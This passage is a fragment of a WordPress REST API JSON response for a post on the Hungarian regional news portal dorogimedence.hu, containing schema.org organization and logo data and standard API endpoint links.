programok","publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/dorogimedence.hu\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"hu"},{"@type":"Organization","@id":"https:\/\/dorogimedence.hu\/#organization","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","url":"https:\/\/dorogimedence.hu\/","logo":{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","width":600,"height":100,"caption":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l"},"image":{"@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/dorogimedence\/"]},{"@type":"Person","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4","name":"dorogimedence.hu","image":{"@type":"ImageObject","inLanguage":"hu","@id":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","url":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","contentUrl":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","caption":"dorogimedence.hu"}}]}},"_links":{"self":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/69815","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/comments?post=69815"}],"version-history":[{"count":0,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/69815\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media\/69816"}],"wp:attachment":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media?parent=69815"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/categories?post=69815"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/tags?post=69815"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}